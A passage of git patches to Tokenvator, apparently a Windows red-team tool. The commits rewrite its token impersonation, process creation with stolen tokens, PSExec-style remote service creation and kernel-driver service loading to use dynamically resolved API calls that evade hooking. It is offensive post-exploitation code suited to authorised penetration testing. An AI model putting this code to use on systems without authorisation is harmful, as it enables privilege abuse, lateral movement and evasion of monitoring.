     {
         ////////////////////////////////////////////////////////////////////////////////
-        // Wrapper for ProcessWithLogonW
+        /// <summary>
+        /// Wrapper for CreateProcessWithLogonW
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="phNewToken"></param>
+        /// <param name="name"></param>
+        /// <param name="arguments"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, string arguments)
         {
-            IntPtr padvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
-            IntPtr pImpersonateLoggedOnUser = Generic.GetExportAddress(padvapi32, "ImpersonateLoggedOnUser");
-            object[] paramaters = { phNewToken };
-            bool retVal = (bool)Generic.DynamicFunctionInvoke(pImpersonateLoggedOnUser, typeof(Win32.Delegates.OpenProcess), ref paramaters);
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.ImpersonateLoggedOnUser(phNewToken)
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hImpersonateLoggedOnUser = Generic.GetExportAddress(hadvapi32, "ImpersonateLoggedOnUser");
+            MonkeyWorks.advapi32.ImpersonateLoggedOnUser fImpersonateLoggedOnUser = (MonkeyWorks.advapi32.ImpersonateLoggedOnUser)Marshal.GetDelegateForFunctionPointer(hImpersonateLoggedOnUser, typeof(MonkeyWorks.advapi32.ImpersonateLoggedOnUser));
+
+            bool retVal = false;
+            try
+            {
+                retVal = fImpersonateLoggedOnUser(phNewToken);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] ImpersonateLoggedOnUser Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
 
 
-            if (IntPtr.Zero != phNewToken && !advapi32.ImpersonateLoggedOnUser(phNewToken))
+            if (IntPtr.Zero != phNewToken && !retVal)
             {
-                Console.WriteLine("[-] Token Impersonation Failed");
                 Misc.GetWin32Error("ImpersonateLoggedOnUser");
                 return false;
             }
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.RevertToSelf();
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hRevertToSelf = Generic.GetExportAddress(hadvapi32, "RevertToSelf");
+            MonkeyWorks.advapi32.RevertToSelf fRevertToSelf = (MonkeyWorks.advapi32.RevertToSelf)Marshal.GetDelegateForFunctionPointer(hRevertToSelf, typeof(MonkeyWorks.advapi32.RevertToSelf));
+
             if (name.Contains("\\"))
             {
                 name = System.IO.Path.GetFullPath(name);
                 if (!System.IO.File.Exists(name))
                 {
                     Console.WriteLine("[-] File Not Found");
-                    advapi32.RevertToSelf();
+                    try
+                    {
+                        fRevertToSelf();
+                    }
+                    catch (Exception ex)
+                    {
+                        Console.WriteLine("[-] RevertToSelf Generated an Exception");
+                        Console.WriteLine("[-] {0}", ex.Message);
+                    }
                     return false;
                 }
             }
@@ -46,18 +86,37 @@ public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, strin
                 if (string.Empty == name)
                 {
                     Console.WriteLine("[-] Unable to find file");
-                    advapi32.RevertToSelf();
+                    try
+                    {
+                        fRevertToSelf();
+                    }
+                    catch (Exception ex)
+                    {
+                        Console.WriteLine("[-] RevertToSelf Generated an Exception");
+                        Console.WriteLine("[-] {0}", ex.Message);
+                    }
                     return false;
                 }
             }
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.CreateProcessWithLogonW("i","j","k", Winbase.LOGON_FLAGS.LOGON_NETCREDENTIALS_ONLY, name, name, Winbase.CREATION_FLAGS.CREATE_DEFAULT_ERROR_MODE, IntPtr.Zero, Environment.CurrentDirectory, ref startupInfo, out processInformation)
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hCreateProcessWithLogonW = Generic.GetExportAddress(hadvapi32, "CreateProcessWithLogonW");
+            MonkeyWorks.advapi32.CreateProcessWithLogonW fCreateProcessWithLogonW = (MonkeyWorks.advapi32.CreateProcessWithLogonW)Marshal.GetDelegateForFunctionPointer(hCreateProcessWithLogonW, typeof(MonkeyWorks.advapi32.CreateProcessWithLogonW));
+
             Console.WriteLine("[*] CreateProcessWithLogonW");
             Winbase._STARTUPINFO startupInfo = new Winbase._STARTUPINFO
             {
                 cb = (uint)Marshal.SizeOf(typeof(Winbase._STARTUPINFO))
             };
             Winbase._PROCESS_INFORMATION processInformation;
-            if (!advapi32.CreateProcessWithLogonW("i","j","k",
+
+            retVal = false;
+            try
+            {
+                retVal = fCreateProcessWithLogonW(
+                string.Empty, string.Empty, string.Empty,
                 Winbase.LOGON_FLAGS.LOGON_NETCREDENTIALS_ONLY,
                 name,
                 name,
@@ -65,22 +124,55 @@ public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, strin
                 IntPtr.Zero,
                 Environment.CurrentDirectory,
                 ref startupInfo,
-                out processInformation
-            ))
+                out processInformation);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] CreateProcessWithLogonW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+
+            if (!retVal)
             {
                 Misc.GetWin32Error("CreateProcessWithLogonW");
-                advapi32.RevertToSelf();
+                try
+                {
+                    fRevertToSelf();
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] RevertToSelf Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                }
+
                 return false;
             }
             
             Console.WriteLine(" [+] Created process: {0}", processInformation.dwProcessId);
             Console.WriteLine(" [+] Created thread:  {0}", processInformation.dwThreadId);
-            advapi32.RevertToSelf();
+            Misc.GetWin32Error("CreateProcessWithLogonW");
+            try
+            {
+                fRevertToSelf();
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] RevertToSelf Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+            }
             return true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Wrapper for CreateProcessWithTokenW
+        /// <summary>
+        /// Wrapper for CreateProcessWithTokenW
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="phNewToken"></param>
+        /// <param name="name"></param>
+        /// <param name="arguments"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         public static bool CreateProcessWithTokenW(IntPtr phNewToken, string name, string arguments)
         {
@@ -102,24 +194,44 @@ public static bool CreateProcessWithTokenW(IntPtr phNewToken, string name, strin
                     return false;
                 }
             }
-            
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // !advapi32.CreateProcessWithTokenW(phNewToken, Winbase.LOGON_FLAGS.LOGON_NETCREDENTIALS_ONLY, name, name + " " + arguments, Winbase.CREATION_FLAGS.NONE, IntPtr.Zero, Environment.CurrentDirectory, ref startupInfo, out processInformation)
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hCreateProcessWithTokenW = Generic.GetExportAddress(hadvapi32, "CreateProcessWithTokenW");
+            MonkeyWorks.advapi32.CreateProcessWithTokenW fCreateProcessWithTokenW = (MonkeyWorks.advapi32.CreateProcessWithTokenW)Marshal.GetDelegateForFunctionPointer(hCreateProcessWithTokenW, typeof(MonkeyWorks.advapi32.CreateProcessWithTokenW));
+
             Console.WriteLine("[*] CreateProcessWithTokenW");
             Winbase._STARTUPINFO startupInfo = new Winbase._STARTUPINFO
             {
                 cb = (uint)Marshal.SizeOf(typeof(Winbase._STARTUPINFO))
             };
             Winbase._PROCESS_INFORMATION processInformation;
-            if (!advapi32.CreateProcessWithTokenW(
-                phNewToken,
-                Winbase.LOGON_FLAGS.LOGON_NETCREDENTIALS_ONLY,
-                name,
-                name + " " + arguments,
-                Winbase.CREATION_FLAGS.NONE,
-                IntPtr.Zero,
-                Environment.CurrentDirectory,
-                ref startupInfo,
-                out processInformation
-            ))
+
+            bool retVal = false;
+            try
+            {
+                retVal = fCreateProcessWithTokenW(
+                    phNewToken,
+                    Winbase.LOGON_FLAGS.LOGON_NETCREDENTIALS_ONLY,
+                    name,
+                    name + " " + arguments,
+                    Winbase.CREATION_FLAGS.NONE,
+                    IntPtr.Zero,
+                    Environment.CurrentDirectory,
+                    ref startupInfo,
+                    out processInformation
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] RevertToSelf Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+       
+            if (!retVal)
             {
                 if (267 == Marshal.GetLastWin32Error())
                 {
@@ -139,13 +251,37 @@ out processInformation
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Returns the full path to an executable specified by just its name
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="name"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         public static string FindFilePath(string name)
         {
+            ////////////////////////////////////////////////////////////////////////////////
+            // kernel32.SearchPath(null, name, null, (uint)lpFileName.Capacity, lpFileName, ref lpFilePart);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+            IntPtr hSearchPathW = Generic.GetExportAddress(hkernel32, "SearchPathW");
+            MonkeyWorks.kernel32.SearchPathW fSearchPathW = (MonkeyWorks.kernel32.SearchPathW)Marshal.GetDelegateForFunctionPointer(hSearchPathW, typeof(MonkeyWorks.kernel32.SearchPathW));
+
             StringBuilder lpFileName = new StringBuilder(260);
             IntPtr lpFilePart = new IntPtr();
-            uint result = kernel32.SearchPath(null, name, null, (uint)lpFileName.Capacity, lpFileName, ref lpFilePart);
+
+            uint result = 0;
+            try
+            {
+                result = fSearchPathW(null, name, null, (uint)lpFileName.Capacity, lpFileName, ref lpFilePart);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] RevertToSelf Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return string.Empty;
+            }
+
             if (string.Empty == lpFileName.ToString())
             {
                 Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);

From 84c49c9bd581ec4a32acaba399a13ea9a4a1c939 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Fri, 10 Sep 2021 19:52:30 -0500
Subject: [PATCH 19/36] Fixed Warnings and converted PSExec to DInvoke

---
 Tokenvator/MainLoop.cs                        |   5 +-
 .../Plugins/AccessTokens/AccessTokens.cs      |  14 +-
 .../Plugins/AccessTokens/TokenManipulation.cs |   5 +-
 Tokenvator/Plugins/Execution/PSExec.cs        | 327 +++++++++++++-----
 Tokenvator/Plugins/NamedPipes/NamedPipes.cs   |   2 +-
 Tokenvator/Resources/Misc.cs                  |  10 +
 Tokenvator/Tokenvator.csproj                  |   2 +-
 7 files changed, 270 insertions(+), 95 deletions(-)

diff --git a/Tokenvator/MainLoop.cs b/Tokenvator/MainLoop.cs
index b13029c..dd2d857 100644
--- a/Tokenvator/MainLoop.cs
+++ b/Tokenvator/MainLoop.cs
@@ -15,7 +15,7 @@ namespace Tokenvator
 {
     partial class MainLoop
     {
-        private static string context = "(Tokens) > ";
+        private const string context = "(Tokens) > ";
         public static string[,] options = new string[,] {
             {"Info", "all", "-", "Info /All"},
             {"Help", "Command", "-", "Help List_Filter_Instances"},
@@ -129,6 +129,7 @@ internal void Run()
                 hToken = tempToken = IntPtr.Zero;
 
                 bool remote = _GetProcessID(input, out processID, out command);
+
                 if (!remote)
                 {
                     hProcess = hBackup;
@@ -144,7 +145,9 @@ internal void Run()
                         }
                     }
                 }
+
                 string action = Misc.NextItem(ref input);
+
                 CommandLineParsing cLP = new CommandLineParsing();
                 if (!string.Equals(action, input, StringComparison.OrdinalIgnoreCase))
                 {
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index 00330a0..7312713 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -192,8 +192,10 @@ public virtual bool OpenProcessToken(int processId, bool showOutput = true)
 
             IntPtr hProcess = new IntPtr();
             MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
-            MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID();
-            clientId.UniqueProcess = new IntPtr(processId);
+            MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
+            {
+                UniqueProcess = new IntPtr(processId)
+            };
 
             uint ntRetVal = 0;
             try
@@ -387,9 +389,11 @@ public bool OpenThreadToken(uint threadId, uint permissions)
 
             IntPtr hThread = new IntPtr();
             MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
-            MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID();
-            clientId.UniqueThread = new IntPtr(threadId);
-           
+            MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
+            {
+                UniqueThread = new IntPtr(threadId)
+            };
+
             uint ntRetVal;
             try
             {
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index 72e2572..4794bd9 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -21,8 +21,6 @@ namespace Tokenvator.Plugins.AccessTokens
 
     partial class TokenManipulation : AccessTokens
     {
-        private Dictionary<uint, string> processes;
-
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Default Constructor
@@ -31,7 +29,7 @@ partial class TokenManipulation : AccessTokens
         ////////////////////////////////////////////////////////////////////////////////
         internal TokenManipulation(IntPtr currentProcessToken) : base(currentProcessToken)
         {
-            processes = new Dictionary<uint, string>();
+
         }
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -249,7 +247,6 @@ public void DisableTokenGroup(string group)
             TokenInformation ti = new TokenInformation(hWorkingToken);
             ti.GetTokenGroups();
             
-
             IntPtr hNtAdjustGroupsToken = Generic.GetSyscallStub("NtAdjustGroupsToken");
             MonkeyWorks.ntdll.NtAdjustGroupsToken fSyscallNtAdjustGroupsToken = (MonkeyWorks.ntdll.NtAdjustGroupsToken)Marshal.GetDelegateForFunctionPointer(hNtAdjustGroupsToken, typeof(MonkeyWorks.ntdll.NtAdjustGroupsToken));
 
diff --git a/Tokenvator/Plugins/Execution/PSExec.cs b/Tokenvator/Plugins/Execution/PSExec.cs
index a15d6df..a43eaa6 100644
--- a/Tokenvator/Plugins/Execution/PSExec.cs
+++ b/Tokenvator/Plugins/Execution/PSExec.cs
@@ -1,16 +1,18 @@
 using System;
 using System.IO;
-using System.Linq;
 using System.Runtime.InteropServices;
 
-using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
+using DInvoke.DynamicInvoke;
 
+using MonkeyWorks.Unmanaged.Headers;
+//using MonkeyWorks.Unmanaged.Libraries;
 
 using Tokenvator.Resources;
 
 namespace Tokenvator.Plugins.Execution
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     sealed class PSExec : IDisposable
     {
         private readonly string serviceName;
@@ -19,6 +21,8 @@ sealed class PSExec : IDisposable
 
         private bool disposed;
 
+        private IntPtr hadvapi32;
+
         ////////////////////////////////////////////////////////////////////////////////
         //
         ////////////////////////////////////////////////////////////////////////////////
@@ -26,6 +30,7 @@ public PSExec(string serviceName)
         {
             this.serviceName = serviceName;
             Console.WriteLine("[*] Using Service Name {0}", serviceName);
+            hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
         }
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -33,8 +38,9 @@ public PSExec(string serviceName)
         ////////////////////////////////////////////////////////////////////////////////
         public PSExec()
         {
-            serviceName = GenerateUuid(12);
+            serviceName = Misc.GenerateUuid(12);
             Console.WriteLine("[*] Using Service Name {0}", serviceName);
+            hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
         }
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -42,41 +48,85 @@ public PSExec()
         ////////////////////////////////////////////////////////////////////////////////
         ~PSExec()
         {
+            if (!disposed)
+            {
+                Dispose();
+            }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Closes the handles that were opened to the service and service controller
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="machineName"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         public void Dispose()
         {
-            if (!disposed)
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.CloseServiceHandle(hSCObject);
+            // kernel32.CloseHandle(hServiceManager);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hCloseServiceHandle = Generic.GetExportAddress(hadvapi32, "CloseServiceHandle");
+            MonkeyWorks.advapi32.CloseServiceHandle fCloseServiceHandle = (MonkeyWorks.advapi32.CloseServiceHandle)Marshal.GetDelegateForFunctionPointer(hCloseServiceHandle, typeof(MonkeyWorks.advapi32.CloseServiceHandle));
+
+            try
             {
-                Delete();
+                fCloseServiceHandle(hSCObject);
             }
-            disposed = true;
-            if (IntPtr.Zero != hSCObject)
+            catch (Exception ex)
             {
-                advapi32.CloseServiceHandle(hSCObject);
+                Console.WriteLine("[-] CloseServiceHandle Generated an Exception");
+                Console.WriteLine(ex.Message);
             }
 
-            if (IntPtr.Zero != hServiceManager)
+            try
+            {
+                fCloseServiceHandle(hServiceManager);
+            }
+            catch (Exception ex)
             {
-                kernel32.CloseHandle(hServiceManager);
+                Console.WriteLine("[-] CloseServiceHandle Generated an Exception");
+                Console.WriteLine(ex.Message);
             }
+
+            disposed = true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Connects to the service controller manager - can be used against a remote system
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="machineName"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        internal bool Connect(string machineName)
+        public bool Connect(string machineName)
         {
             Console.WriteLine("[*] Connecting to {0}", machineName);
 
-            hServiceManager = advapi32.OpenSCManager(
-                machineName, 
-                null, 
-                Winsvc.dwSCManagerDesiredAccess.SC_MANAGER_CONNECT | Winsvc.dwSCManagerDesiredAccess.SC_MANAGER_CREATE_SERVICE
-            );
+            ////////////////////////////////////////////////////////////////////////////////
+            // hServiceManager = advapi32.OpenSCManager(machineName, null, Winsvc.dwSCManagerDesiredAccess.SC_MANAGER_CONNECT | Winsvc.dwSCManagerDesiredAccess.SC_MANAGER_CREATE_SERVICE);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hOpenSCManagerW = Generic.GetExportAddress(hadvapi32, "OpenSCManagerW");
+            MonkeyWorks.advapi32.OpenSCManagerW fOpenSCManagerW = (MonkeyWorks.advapi32.OpenSCManagerW)Marshal.GetDelegateForFunctionPointer(hOpenSCManagerW, typeof(MonkeyWorks.advapi32.OpenSCManagerW));
+
+            try
+            {
+                hServiceManager = fOpenSCManagerW(
+                    machineName,
+                    null,
+                    Winsvc.dwSCManagerDesiredAccess.SC_MANAGER_CONNECT
+                    | Winsvc.dwSCManagerDesiredAccess.SC_MANAGER_CREATE_SERVICE
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] OpenSCManagerW Generated an Exception");
+                Console.WriteLine(ex.Message);
+                return false;
+            }
 
             if (IntPtr.Zero == hServiceManager)
             {
@@ -91,92 +141,147 @@ internal bool Connect(string machineName)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Creates a service
+        /// <summary>
+        /// Creates a generic standalone service
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="lpBinaryPathName"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        internal bool Create(string lpBinaryPathName)
+        public bool Create(string lpBinaryPathName)
         {
             Console.WriteLine("[*] Creating service {0}", serviceName);
-            //Console.WriteLine(lpBinaryPathName);
-            IntPtr hSCObject = advapi32.CreateService(
-                hServiceManager,
-                serviceName, serviceName,
-                Winsvc.dwDesiredAccess.SERVICE_ALL_ACCESS,
-                Winsvc.dwServiceType.SERVICE_WIN32_OWN_PROCESS,
-                Winsvc.dwStartType.SERVICE_DEMAND_START,
-                Winsvc.dwErrorControl.SERVICE_ERROR_IGNORE,
-                lpBinaryPathName,
-                string.Empty, null, string.Empty, null, null
-            );
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // IntPtr hSCObject = advapi32.CreateService(hServiceManager,serviceName, serviceName,Winsvc.dwDesiredAccess.SERVICE_ALL_ACCESS,Winsvc.dwServiceType.SERVICE_WIN32_OWN_PROCESS,Winsvc.dwStartType.SERVICE_DEMAND_START,Winsvc.dwErrorControl.SERVICE_ERROR_IGNORE,lpBinaryPathName, string.Empty, null, string.Empty, null, null);            
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hCreateServiceW = Generic.GetExportAddress(hadvapi32, "CreateServiceW");
+            MonkeyWorks.advapi32.CreateServiceW fCreateServiceW = (MonkeyWorks.advapi32.CreateServiceW)Marshal.GetDelegateForFunctionPointer(hCreateServiceW, typeof(MonkeyWorks.advapi32.CreateServiceW));
+            
+            try
+            {
+                hSCObject = fCreateServiceW(
+                    hServiceManager,
+                    serviceName, serviceName,
+                    Winsvc.dwDesiredAccess.SERVICE_ALL_ACCESS,
+                    Winsvc.dwServiceType.SERVICE_WIN32_OWN_PROCESS,
+                    Winsvc.dwStartType.SERVICE_DEMAND_START,
+                    Winsvc.dwErrorControl.SERVICE_ERROR_IGNORE,
+                    lpBinaryPathName,
+                    string.Empty, null, string.Empty, null, null
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] CreateServiceW Generated an Exception");
+                Console.WriteLine(ex.Message);
+                return false;
+            }
 
             if (IntPtr.Zero == hSCObject)
             {
                 Console.WriteLine("[-] Failed to create service");
-                Console.WriteLine(Marshal.GetLastWin32Error());
-                disposed = true;
+                Misc.GetWin32Error("CreateServiceW");
                 return false;
             }
 
-            advapi32.CloseServiceHandle(hSCObject);
             Console.WriteLine("[+] Created service {0}", serviceName);
             return true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Creates a service
+        /// <summary>
+        /// Creates a service to execute a kernel driver
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="source"></param>
+        /// <param name="overwrite"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        internal bool CreateDriver(string source, bool overwrite)
+        public bool CreateDriver(string source, bool overwrite)
         {
             Console.WriteLine("[*] Creating service {0}", serviceName);
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // Driver file needs to copied to a specific location
+            ////////////////////////////////////////////////////////////////////////////////
             string destination = string.Format("{0}\\System32\\drivers\\", Environment.GetEnvironmentVariable("SystemRoot"));
-
             string filename = Path.GetFileName(source);
-
             destination += filename;
-
             Console.WriteLine("[*] Copying file from {0} to {1}", source, destination);
-
             File.Copy(source, destination, overwrite);
 
-            IntPtr hSCObject = advapi32.CreateService(
-                hServiceManager,
-                serviceName, serviceName,
-                Winsvc.dwDesiredAccess.SERVICE_ALL_ACCESS,
-                Winsvc.dwServiceType.SERVICE_KERNEL_DRIVER,
-                Winsvc.dwStartType.SERVICE_DEMAND_START,
-                Winsvc.dwErrorControl.SERVICE_ERROR_NORMAL,
-                destination,
-                string.Empty, null, string.Empty, null, null
-            );
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.CreateService(hServiceManager, serviceName, serviceName, Winsvc.dwDesiredAccess.SERVICE_ALL_ACCESS, Winsvc.dwServiceType.SERVICE_KERNEL_DRIVER, Winsvc.dwStartType.SERVICE_DEMAND_START, Winsvc.dwErrorControl.SERVICE_ERROR_NORMAL, destination, string.Empty, null, string.Empty, null, null);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hCreateServiceW = Generic.GetExportAddress(hadvapi32, "CreateServiceW");
+            MonkeyWorks.advapi32.CreateServiceW fCreateServiceW = (MonkeyWorks.advapi32.CreateServiceW)Marshal.GetDelegateForFunctionPointer(hCreateServiceW, typeof(MonkeyWorks.advapi32.CreateServiceW));
+
+            try
+            {
+                hSCObject = fCreateServiceW(
+                    hServiceManager,
+                    serviceName, serviceName,
+                    Winsvc.dwDesiredAccess.SERVICE_ALL_ACCESS,
+                    Winsvc.dwServiceType.SERVICE_KERNEL_DRIVER,
+                    Winsvc.dwStartType.SERVICE_DEMAND_START,
+                    Winsvc.dwErrorControl.SERVICE_ERROR_NORMAL,
+                    destination,
+                    string.Empty, null, string.Empty, null, null
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] CreateServiceW Generated an Exception");
+                Console.WriteLine(ex.Message);
+                return false;
+            }
 
             if (IntPtr.Zero == hSCObject)
             {
                 Console.WriteLine("[-] Failed to create service");
                 Misc.GetWin32Error("CreateService");
-                disposed = true;
                 return false;
             }
 
-            advapi32.CloseServiceHandle(hSCObject);
             Console.WriteLine("[+] Created service {0}", serviceName);
             return true;
         }
 
         ///////////////////////////////////////////////////////////////////////////////
-        // Opens a handle to a service
+        /// <summary>
+        /// Opens a handle to a service
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <returns></returns>
         ///////////////////////////////////////////////////////////////////////////////
-        internal bool Open()
+        public bool Open()
         {
-            hSCObject = advapi32.OpenService(
-                hServiceManager, 
-                serviceName, 
-                Winsvc.dwDesiredAccess.SERVICE_ALL_ACCESS
-            );
+            ///////////////////////////////////////////////////////////////////////////////
+            // advapi32.OpenService(hServiceManager, serviceName, Winsvc.dwDesiredAccess.SERVICE_ALL_ACCESS);
+            ///////////////////////////////////////////////////////////////////////////////
+            IntPtr hOpenServiceW = Generic.GetExportAddress(hadvapi32, "OpenServiceW");
+            MonkeyWorks.advapi32.OpenServiceW fOpenServiceW = (MonkeyWorks.advapi32.OpenServiceW)Marshal.GetDelegateForFunctionPointer(hOpenServiceW, typeof(MonkeyWorks.advapi32.OpenServiceW));
+
+            try
+            {
+                hSCObject = fOpenServiceW(
+                    hServiceManager,
+                    serviceName,
+                    Winsvc.dwDesiredAccess.SERVICE_ALL_ACCESS
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] OpenServiceW Generated an Exception");
+                Console.WriteLine(ex.Message);
+                return false;
+            }
 
             if (IntPtr.Zero == hSCObject)
             {
                 Console.WriteLine("[-] Failed to open service");
-                Misc.GetWin32Error("Open");
+                Misc.GetWin32Error("OpenServiceW");
                 return false;
             }
 
@@ -185,17 +290,39 @@ internal bool Open()
         }
 
         ///////////////////////////////////////////////////////////////////////////////
-        // Starts the service, if there is a start timeout error, return true
+        /// <summary>
+        /// Starts the service, if there is a start timeout error, return true
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <returns></returns>
         ///////////////////////////////////////////////////////////////////////////////
         internal bool Start()
         {
-            if (!advapi32.StartService(hSCObject, 0, null))
+            ///////////////////////////////////////////////////////////////////////////////
+            // advapi32.StartService(hSCObject, 0, null)
+            ///////////////////////////////////////////////////////////////////////////////
+            IntPtr hStartServiceW = Generic.GetExportAddress(hadvapi32, "StartServiceW");
+            MonkeyWorks.advapi32.StartServiceW fStartServiceW = (MonkeyWorks.advapi32.StartServiceW)Marshal.GetDelegateForFunctionPointer(hStartServiceW, typeof(MonkeyWorks.advapi32.StartServiceW));
+
+            bool retVal = false;
+            try
+            {
+                retVal = fStartServiceW(hSCObject, 0, null);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] StartServiceW Generated an Exception");
+                Console.WriteLine(ex.Message);
+                return false;
+            }
+
+            if (!retVal)
             {
                 int error = Marshal.GetLastWin32Error();
                 if (1053 != error)
                 {
                     Console.WriteLine("[-] Failed to start service");
-                    Misc.GetWin32Error("StartService");
+                    Misc.GetWin32Error("StartServiceW");
                     return false;
                 }
             }
@@ -204,50 +331,84 @@ internal bool Start()
         }
 
         ///////////////////////////////////////////////////////////////////////////////
-        // Stops the service, if service is already stopped returns true
+        /// <summary>
+        /// Stops the service, if service is already stopped returns true
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <returns></returns>
         ///////////////////////////////////////////////////////////////////////////////
         internal bool Stop()
         {
-            Winsvc._SERVICE_STATUS serviceStatus;
-            IntPtr hControlService = advapi32.ControlService(hSCObject, Winsvc.dwControl.SERVICE_CONTROL_STOP, out serviceStatus);
+            ///////////////////////////////////////////////////////////////////////////////
+            // advapi32.ControlService(hSCObject, Winsvc.dwControl.SERVICE_CONTROL_STOP, out serviceStatus);
+            ///////////////////////////////////////////////////////////////////////////////
+            IntPtr hControlService = Generic.GetExportAddress(hadvapi32, "ControlService");
+            MonkeyWorks.advapi32.ControlService fControlService = (MonkeyWorks.advapi32.ControlService)Marshal.GetDelegateForFunctionPointer(hControlService, typeof(MonkeyWorks.advapi32.ControlService));
+
+            Winsvc._SERVICE_STATUS serviceStatus = new Winsvc._SERVICE_STATUS();;
+
+            bool retVal = false;
+            try
+            {
